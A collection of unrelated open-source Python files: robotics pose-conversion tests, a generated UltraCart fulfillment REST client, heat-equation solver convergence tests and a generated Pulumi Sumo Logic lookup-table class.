nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="yxz"))
x = tr2x(T, representation="arm")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="xyz"))
x = tr2x(T, representation="vehicle")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="zyx"))
x = tr2x(T, representation="camera")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="yxz"))
x = tr2x(T, representation="exp")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], trlog(t2r(R), twist=True))
def test_x2tr(self):
t = [1, 2, 3]
gamma = [0.3, 0.2, 0.1]
x = np.r_[t, gamma]
nt.assert_array_almost_equal(x2tr(x, representation="eul"), transl(t) @ eul2tr(gamma))
nt.assert_array_almost_equal(x2tr(x, representation="rpy/xyz"), transl(t) @ rpy2tr(gamma, order="xyz"))
nt.assert_array_almost_equal(x2tr(x, representation="rpy/zyx"), transl(t) @ rpy2tr(gamma, order="zyx"))
nt.assert_array_almost_equal(x2tr(x, representation="rpy/yxz"), transl(t) @ rpy2tr(gamma, order="yxz"))
nt.assert_array_almost_equal(x2tr(x, representation="arm"), transl(t) @ rpy2tr(gamma, order="xyz"))
nt.assert_array_almost_equal(x2tr(x, representation="vehicle"), transl(t) @ rpy2tr(gamma, order="zyx"))
nt.assert_array_almost_equal(x2tr(x, representation="camera"), transl(t) @ rpy2tr(gamma, order="yxz"))
nt.assert_array_almost_equal(x2tr(x, representation="exp"), transl(t) @ r2t(trexp(gamma)))
# ---------------------------------------------------------------------------------------#
if __name__ == "__main__":
unittest.main()
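The TODO in `test_tr2jac` above suggests forming the expected matrices directly from block R matrices instead of hard-coding them. A minimal numpy sketch of that construction (`block_diag_jacobian` is an illustrative helper name, not part of the library; it builds the generic 6x6 block-diagonal form, without the transpose/inverse conventions `tr2jac` may apply):

```python
import numpy as np


def block_diag_jacobian(R):
    """6x6 block-diagonal matrix [[R, 0], [0, R]] for a 3x3 rotation R."""
    J = np.zeros((6, 6))
    J[:3, :3] = R  # linear-velocity block
    J[3:, 3:] = R  # angular-velocity block
    return J
```

With `R = np.eye(3)` this reproduces the identity expectation used for the pure-translation case in the test.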
# ---------------------------------------------------------------------------------------#
# File: ultracart/api/fulfillment_api.py
# Repo: UltraCart/rest_api_v2_sdk_python (license: Apache-2.0)
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ultracart.api_client import ApiClient
from ultracart.configuration import Configuration
class FulfillmentApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
@classmethod
def fromApiKey(cls, apiKey, verify_ssl = True, debug = False):
config = Configuration()
config.api_key['x-ultracart-simple-key'] = apiKey
config.debug = debug
config.verify_ssl = verify_ssl
api_client = ApiClient(configuration=config, header_name='X-UltraCart-Api-Version', header_value='2017-03-01')
return FulfillmentApi(api_client)
    def acknowledge_orders(self, distribution_center_code, order_ids, **kwargs):  # noqa: E501
        """Acknowledge receipt of orders.  # noqa: E501

        Acknowledge receipt of orders so that they are removed from the fulfillment queue. This method must be called after receiving an order (via webhook) or retrieving it (via the retrieve orders method).  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.acknowledge_orders(distribution_center_code, order_ids, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str distribution_center_code: Distribution center code (required)
        :param list[str] order_ids: Orders to acknowledge receipt of (limit 100) (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.acknowledge_orders_with_http_info(distribution_center_code, order_ids, **kwargs)  # noqa: E501
        else:
            (data) = self.acknowledge_orders_with_http_info(distribution_center_code, order_ids, **kwargs)  # noqa: E501
            return data
    def acknowledge_orders_with_http_info(self, distribution_center_code, order_ids, **kwargs):  # noqa: E501
        """Acknowledge receipt of orders.  # noqa: E501

        Acknowledge receipt of orders so that they are removed from the fulfillment queue. This method must be called after receiving an order (via webhook) or retrieving it (via the retrieve orders method).  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.acknowledge_orders_with_http_info(distribution_center_code, order_ids, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str distribution_center_code: Distribution center code (required)
        :param list[str] order_ids: Orders to acknowledge receipt of (limit 100) (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['distribution_center_code', 'order_ids']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method acknowledge_orders" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'distribution_center_code' is set
        if ('distribution_center_code' not in params or
                params['distribution_center_code'] is None):
            raise ValueError("Missing the required parameter `distribution_center_code` when calling `acknowledge_orders`")  # noqa: E501
        # verify the required parameter 'order_ids' is set
        if ('order_ids' not in params or
                params['order_ids'] is None):
            raise ValueError("Missing the required parameter `order_ids` when calling `acknowledge_orders`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'distribution_center_code' in params:
            path_params['distribution_center_code'] = params['distribution_center_code']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'order_ids' in params:
            body_params = params['order_ids']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

        return self.api_client.call_api(
            '/fulfillment/distribution_centers/{distribution_center_code}/acknowledgements', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def generate_packing_slip(self, distribution_center_code, order_id, **kwargs):  # noqa: E501
        """Generate a packing slip for this order for the given distribution center.  # noqa: E501

        The packing slip PDF that is returned is base 64 encoded  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.generate_packing_slip(distribution_center_code, order_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str distribution_center_code: Distribution center code (required)
        :param str order_id: Order ID (required)
        :return: OrdersResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.generate_packing_slip_with_http_info(distribution_center_code, order_id, **kwargs)  # noqa: E501
        else:
            (data) = self.generate_packing_slip_with_http_info(distribution_center_code, order_id, **kwargs)  # noqa: E501
            return data
    def generate_packing_slip_with_http_info(self, distribution_center_code, order_id, **kwargs):  # noqa: E501
        """Generate a packing slip for this order for the given distribution center.  # noqa: E501

        The packing slip PDF that is returned is base 64 encoded  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.generate_packing_slip_with_http_info(distribution_center_code, order_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str distribution_center_code: Distribution center code (required)
        :param str order_id: Order ID (required)
        :return: OrdersResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['distribution_center_code', 'order_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method generate_packing_slip" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'distribution_center_code' is set
        if ('distribution_center_code' not in params or
                params['distribution_center_code'] is None):
            raise ValueError("Missing the required parameter `distribution_center_code` when calling `generate_packing_slip`")  # noqa: E501
        # verify the required parameter 'order_id' is set
        if ('order_id' not in params or
                params['order_id'] is None):
            raise ValueError("Missing the required parameter `order_id` when calling `generate_packing_slip`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'distribution_center_code' in params:
            path_params['distribution_center_code'] = params['distribution_center_code']  # noqa: E501
        if 'order_id' in params:
            path_params['order_id'] = params['order_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

        return self.api_client.call_api(
            '/fulfillment/distribution_centers/{distribution_center_code}/orders/{order_id}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='OrdersResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_distribution_center_orders(self, distribution_center_code, **kwargs):  # noqa: E501
        """Retrieve orders queued up for this distribution center.  # noqa: E501

        Retrieves up to 100 orders that are queued up in this distribution center.  You must acknowledge them before additional new orders will be returned.  There is NO record chunking.  You'll get the same 100 records again and again until you acknowledge orders.  The orders that are returned contain only items for this distribution center and are by default completely expanded with billing, buysafe, channel_partner, checkout, coupons, customer_profile, edi, gift, gift_certificate, internal, items, payment, shipping, summary, taxes.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_distribution_center_orders(distribution_center_code, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str distribution_center_code: Distribution center code (required)
        :return: OrdersResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_distribution_center_orders_with_http_info(distribution_center_code, **kwargs)  # noqa: E501
        else:
            (data) = self.get_distribution_center_orders_with_http_info(distribution_center_code, **kwargs)  # noqa: E501
            return data
"""Retrieve orders queued up for this distribution center. # noqa: E501
Retrieves up to 100 orders that are queued up in this distribution center. You must acknowledge them before additional new orders will be returned. There is NO record chunking. You'll get the same 100 records again and again until you acknowledge orders. The orders that are returned contain only items for this distribution center and are by default completely expanded with billing, buysafe, channel_partner, checkout, coupons, customer_profile, edi, gift, gift_certificate, internal, items, payment, shipping, summary, taxes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distribution_center_orders_with_http_info(distribution_center_code, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:return: OrdersResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['distribution_center_code'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_distribution_center_orders" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'distribution_center_code' is set
if ('distribution_center_code' not in params or
params['distribution_center_code'] is None):
raise ValueError("Missing the required parameter `distribution_center_code` when calling `get_distribution_center_orders`") # noqa: E501
collection_formats = {}
path_params = {}
if 'distribution_center_code' in params:
path_params['distribution_center_code'] = params['distribution_center_code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/fulfillment/distribution_centers/{distribution_center_code}/orders', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrdersResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
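    # The docstring above describes a poll-and-acknowledge protocol: the same batch
    # of up to 100 orders is returned until it is acknowledged. A hedged sketch of
    # the resulting client loop follows. `drain_order_queue`, `handle_order`, and the
    # `orders`/`order_id` attribute names are illustrative assumptions; only
    # `get_distribution_center_orders` and `acknowledge_orders` come from this API.

```python
def drain_order_queue(api, distribution_center_code, handle_order, max_batches=100):
    """Process queued fulfillment orders batch by batch.

    Because the API has no record chunking, acknowledging a batch is what
    advances the queue; an empty batch means the queue is drained.
    """
    for _ in range(max_batches):
        response = api.get_distribution_center_orders(distribution_center_code)
        orders = getattr(response, 'orders', None) or []
        if not orders:
            return  # queue drained
        for order in orders:
            handle_order(order)
        # Acknowledge only after processing succeeds, so a crash re-delivers the batch.
        api.acknowledge_orders(distribution_center_code, [o.order_id for o in orders])
```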
    def get_distribution_centers(self, **kwargs):  # noqa: E501
        """Retrieve distribution centers  # noqa: E501

        Retrieves the distribution centers that this user has access to.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_distribution_centers(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: DistributionCentersResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_distribution_centers_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_distribution_centers_with_http_info(**kwargs)  # noqa: E501
            return data
    def get_distribution_centers_with_http_info(self, **kwargs):  # noqa: E501
        """Retrieve distribution centers  # noqa: E501

        Retrieves the distribution centers that this user has access to.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_distribution_centers_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: DistributionCentersResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_distribution_centers" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

        return self.api_client.call_api(
            '/fulfillment/distribution_centers', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='DistributionCentersResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def ship_orders(self, distribution_center_code, shipments, **kwargs):  # noqa: E501
        """Mark orders as shipped  # noqa: E501

        Store the tracking information and mark the order shipped for this distribution center.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.ship_orders(distribution_center_code, shipments, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str distribution_center_code: Distribution center code (required)
        :param list[FulfillmentShipment] shipments: Orders to mark shipped (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.ship_orders_with_http_info(distribution_center_code, shipments, **kwargs)  # noqa: E501
        else:
            (data) = self.ship_orders_with_http_info(distribution_center_code, shipments, **kwargs)  # noqa: E501
            return data
    def ship_orders_with_http_info(self, distribution_center_code, shipments, **kwargs):  # noqa: E501
        """Mark orders as shipped  # noqa: E501

        Store the tracking information and mark the order shipped for this distribution center.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.ship_orders_with_http_info(distribution_center_code, shipments, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str distribution_center_code: Distribution center code (required)
        :param list[FulfillmentShipment] shipments: Orders to mark shipped (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['distribution_center_code', 'shipments']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method ship_orders" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'distribution_center_code' is set
        if ('distribution_center_code' not in params or
                params['distribution_center_code'] is None):
            raise ValueError("Missing the required parameter `distribution_center_code` when calling `ship_orders`")  # noqa: E501
        # verify the required parameter 'shipments' is set
        if ('shipments' not in params or
                params['shipments'] is None):
            raise ValueError("Missing the required parameter `shipments` when calling `ship_orders`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'distribution_center_code' in params:
            path_params['distribution_center_code'] = params['distribution_center_code']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'shipments' in params:
            body_params = params['shipments']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

        return self.api_client.call_api(
            '/fulfillment/distribution_centers/{distribution_center_code}/shipments', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def update_inventory(self, distribution_center_code, inventories, **kwargs):  # noqa: E501
        """Update inventory  # noqa: E501

        Update the inventory for items associated with this distribution center  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_inventory(distribution_center_code, inventories, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str distribution_center_code: Distribution center code (required)
        :param list[FulfillmentInventory] inventories: Inventory updates (limit 500) (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_inventory_with_http_info(distribution_center_code, inventories, **kwargs)  # noqa: E501
        else:
            (data) = self.update_inventory_with_http_info(distribution_center_code, inventories, **kwargs)  # noqa: E501
            return data
    def update_inventory_with_http_info(self, distribution_center_code, inventories, **kwargs):  # noqa: E501
        """Update inventory  # noqa: E501

        Update the inventory for items associated with this distribution center  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_inventory_with_http_info(distribution_center_code, inventories, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str distribution_center_code: Distribution center code (required)
        :param list[FulfillmentInventory] inventories: Inventory updates (limit 500) (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['distribution_center_code', 'inventories']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_inventory" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'distribution_center_code' is set
        if ('distribution_center_code' not in params or
                params['distribution_center_code'] is None):
            raise ValueError("Missing the required parameter `distribution_center_code` when calling `update_inventory`")  # noqa: E501
        # verify the required parameter 'inventories' is set
        if ('inventories' not in params or
                params['inventories'] is None):
            raise ValueError("Missing the required parameter `inventories` when calling `update_inventory`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'distribution_center_code' in params:
            path_params['distribution_center_code'] = params['distribution_center_code']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'inventories' in params:
            body_params = params['inventories']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

        return self.api_client.call_api(
            '/fulfillment/distribution_centers/{distribution_center_code}/inventory', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
# ---------------------------------------------------------------------------------------#
# File: test/test_heat_equation.py
# Repo: kjetil-lye/ismo_heat (license: MIT)
import unittest
import heat
import numpy as np
class TestHeatEquation(unittest.TestCase):
def test_zero(self):
initial_data = lambda x: 0
dt = 1 / 1024.
dx = dt
end_time = 1.25
solution_to_heat_equation = heat.solve_heat_equation(initial_data, dt, dx, end_time)
self.assertEqual(int(1 / dt), solution_to_heat_equation.shape[0])
self.assertTrue(np.all(solution_to_heat_equation == np.zeros_like(solution_to_heat_equation)))
def test_sine_single(self):
# we do a quick convergence test to make sure it is indeed second order
initial_data = lambda x: np.sin(np.pi * x)
resolutions = 2.0 ** np.arange(-5, -12, -1)
errors = []
end_time = 1.25
for dx in resolutions:
dt = dx
solution_to_heat_equation = heat.solve_heat_equation(initial_data, dt, dx, end_time)
self.assertEqual(int(1 / dx), solution_to_heat_equation.shape[0])
x = np.arange(0, 1, dx)
exact_solution = np.exp(-np.pi ** 2 * end_time) * initial_data(x)
difference_in_l2_norm = np.linalg.norm((exact_solution - solution_to_heat_equation) * dx, ord=2)
errors.append(difference_in_l2_norm)
convergence_rate = np.polyfit(np.log(resolutions), np.log(errors), 1)[0]
self.assertGreaterEqual(convergence_rate, 2)
def test_sine_three_modes(self):
        # we do a quick convergence test to make sure it is indeed second order
        resolutions = 2.0 ** np.arange(-5, -12, -1)
        errors = []
        end_time = 1.25
        coefficients = [0.4, 0.2, 0.7]

        for dx in resolutions:
            dt = dx
            initial_data = heat.InitialDataControlSine(coefficients)
            solution_to_heat_equation = heat.solve_heat_equation(initial_data, dt, dx, end_time)
            self.assertEqual(int(1 / dx), solution_to_heat_equation.shape[0])

            x = np.arange(0, 1, dx)
            exact_solution = initial_data.exact_solution(x, end_time)
            difference_in_l2_norm = np.linalg.norm((exact_solution - solution_to_heat_equation) * dx, ord=2)
            errors.append(difference_in_l2_norm)

        convergence_rate = np.polyfit(np.log(resolutions), np.log(errors), 1)[0]
        self.assertGreaterEqual(convergence_rate, 2)

    def test_sine_single_different_coefficient(self):
        # we do a quick convergence test to make sure it is indeed second order
        initial_data = lambda x: np.sin(np.pi * x)
        resolutions = 2.0 ** np.arange(-5, -12, -1)
        errors = []
        end_time = 1.25
        q = 0.8

        for dx in resolutions:
            dt = dx
            solution_to_heat_equation = heat.solve_heat_equation(initial_data, dt, dx, end_time, q=q)
            self.assertEqual(int(1 / dx), solution_to_heat_equation.shape[0])

            x = np.arange(0, 1, dx)
            exact_solution = np.exp(-q * np.pi ** 2 * end_time) * initial_data(x)
            difference_in_l2_norm = np.linalg.norm((exact_solution - solution_to_heat_equation) * dx, ord=2)
            errors.append(difference_in_l2_norm)

        convergence_rate = np.polyfit(np.log(resolutions), np.log(errors), 1)[0]
        self.assertGreaterEqual(convergence_rate, 1.9)

    def test_sine_three_modes_different_coefficient(self):
        # we do a quick convergence test to make sure it is indeed second order
        resolutions = 2.0 ** np.arange(-5, -12, -1)
        errors = []
        end_time = 1.25
        coefficients = [0.4, 0.2, 0.7]
        q = 1.3

        for dx in resolutions:
            dt = dx
            initial_data = heat.InitialDataControlSine(coefficients)
            solution_to_heat_equation = heat.solve_heat_equation(initial_data, dt, dx, end_time, q=q)
            self.assertEqual(int(1 / dx), solution_to_heat_equation.shape[0])

            x = np.arange(0, 1, dx)
            exact_solution = initial_data.exact_solution(x, end_time, q)
            difference_in_l2_norm = np.linalg.norm((exact_solution - solution_to_heat_equation) * dx, ord=2)
            errors.append(difference_in_l2_norm)

        convergence_rate = np.polyfit(np.log(resolutions), np.log(errors), 1)[0]
        self.assertGreaterEqual(convergence_rate, 1.9)


if __name__ == '__main__':
    unittest.main()
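All three tests above recover the convergence order as the slope of a least-squares fit of log(error) against log(dx). A minimal, self-contained sketch of that estimate (`fit_convergence_rate` is an illustrative name, not part of the test module):

```python
# Standalone sketch of the convergence-rate estimate used in the tests:
# fit a line to log(error) vs log(dx); the slope is the observed order.
import numpy as np

def fit_convergence_rate(resolutions, errors):
    """Least-squares slope of log(errors) against log(resolutions)."""
    return np.polyfit(np.log(resolutions), np.log(errors), 1)[0]

# Synthetic errors decaying like dx**2 should give a slope of ~2.
dx = 2.0 ** np.arange(-5, -12, -1)
errors = 3.0 * dx ** 2
rate = fit_convergence_rate(dx, errors)
```

On a perfect power law the fitted slope equals the exponent exactly, which is why the tests can assert a lower bound close to 2.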
# coding=utf-8
# Source: pulumi/pulumi-sumologic (ECL-2.0, Apache-2.0): sdk/python/pulumi_sumologic/lookup_table.py
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***

import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *

__all__ = ['LookupTableArgs', 'LookupTable']


@pulumi.input_type
class LookupTableArgs:
    def __init__(__self__, *,
                 description: pulumi.Input[str],
                 fields: Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parent_folder_id: Optional[pulumi.Input[str]] = None,
                 primary_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 size_limit_action: Optional[pulumi.Input[str]] = None,
                 ttl: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a LookupTable resource.
        :param pulumi.Input[str] description: The description of the lookup table.
        :param pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]] fields: The list of fields in the lookup table.
        :param pulumi.Input[str] name: The name of the lookup table.
        :param pulumi.Input[str] parent_folder_id: The parent-folder-path identifier of the lookup table in the Library.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] primary_keys: The primary key field names.
        :param pulumi.Input[int] ttl: A time to live for each entry in the lookup table (in minutes). 365 days is the maximum time to live for each entry that you can specify. Setting it to 0 means that the records will not expire automatically.
        """
        pulumi.set(__self__, "description", description)
        if fields is not None:
            pulumi.set(__self__, "fields", fields)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if parent_folder_id is not None:
            pulumi.set(__self__, "parent_folder_id", parent_folder_id)
        if primary_keys is not None:
            pulumi.set(__self__, "primary_keys", primary_keys)
        if size_limit_action is not None:
            pulumi.set(__self__, "size_limit_action", size_limit_action)
        if ttl is not None:
            pulumi.set(__self__, "ttl", ttl)

    @property
    @pulumi.getter
    def description(self) -> pulumi.Input[str]:
        """
        The description of the lookup table.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: pulumi.Input[str]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def fields(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]]:
        """
        The list of fields in the lookup table.
        """
        return pulumi.get(self, "fields")

    @fields.setter
    def fields(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LookupTableFieldArgs']]]]):
        pulumi.set(self, "fields", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the lookup table.
        """
        return pulumi.get(self, "name")

